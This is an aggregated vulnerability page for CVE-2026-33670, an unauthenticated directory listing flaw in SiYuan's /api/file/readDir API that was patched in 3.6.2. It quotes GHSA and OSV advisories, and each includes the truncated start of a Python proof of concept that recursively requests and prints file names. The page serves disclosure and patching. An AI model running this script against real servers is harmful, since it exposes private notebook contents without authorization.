CVE-2026-33670
published 2026-03-26CVE-2026-33670: SiYuan is a personal knowledge management system. Prior to version 3.6.2, the /api/file/readDir interface was used to traverse and retrieve the file names of…
PriorityP350high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
EPSS
0.66%
46.9th percentile
SiYuan is a personal knowledge management system. Prior to version 3.6.2, the /api/file/readDir interface was used to traverse and retrieve the file names of all documents under a notebook. Version 3.6.2 patches the issue.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| b3log | siyuan | < 3.6.2 | 3.6.2 |
| github.com | siyuan-note_siyuan_kernel | 0 – 0.0.0-20260317012524-fe4523fff2c8 | — |
| siyuan-note | siyuan | < 3.6.2 | 3.6.2 |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
SiYuan has directory traversal within its publishing service in github.com/siyuan-note/siyuan/kernel
osv·2026-03-26
CVE-2026-33670 SiYuan has directory traversal within its publishing service in github.com/siyuan-note/siyuan/kernel
SiYuan has directory traversal within its publishing service in github.com/siyuan-note/siyuan/kernel
SiYuan has directory traversal within its publishing service in github.com/siyuan-note/siyuan/kernel
GHSA
SiYuan has directory traversal within its publishing service
ghsa·2026-03-25
CVE-2026-33670 [CRITICAL] CWE-22 SiYuan has directory traversal within its publishing service
SiYuan has directory traversal within its publishing service
### Details
The /api/file/readDir interface was used to traverse and retrieve the file names of all documents under a notebook.
### PoC
```python
#!/usr/bin/env python3
"""POC: SiYuan /api/file/readDir 未鉴权目录遍历"""
import requests, json, sys
def poc(target):
base = target.rstrip("/")
url = f"{base}/api/file/readDir"
def read_dir(path, depth=0, max_depth=4):
try:
r = requests.post(url, json={"path":path},
headers={"Content-Type":"application/json"}, timeout=10)
data = r.json()
except Exception as e:
return
if data.get("code") != 0:
return
entries = data.get("data") or []
for entry in entries:
name = entry.get("name","")
if name.startswith("."):
continue
icon = "📁" if entry.get("isDir") else "📄"
indent = " " * depth
print(f" {
OSV
SiYuan has directory traversal within its publishing service
osv·2026-03-25
CVE-2026-33670 [CRITICAL] SiYuan has directory traversal within its publishing service
SiYuan has directory traversal within its publishing service
### Details
The /api/file/readDir interface was used to traverse and retrieve the file names of all documents under a notebook.
### PoC
```python
#!/usr/bin/env python3
"""POC: SiYuan /api/file/readDir 未鉴权目录遍历"""
import requests, json, sys
def poc(target):
base = target.rstrip("/")
url = f"{base}/api/file/readDir"
def read_dir(path, depth=0, max_depth=4):
try:
r = requests.post(url, json={"path":path},
headers={"Content-Type":"application/json"}, timeout=10)
data = r.json()
except Exception as e:
return
if data.get("code") != 0:
return
entries = data.get("data") or []
for entry in entries:
name = entry.get("name","")
if name.startswith("."):
continue
icon = "📁" if entry.get("isDir") else "📄"
indent = " " * depth
print(f" {
No detection rules found.
No public exploits indexed.
2026-03-26
Published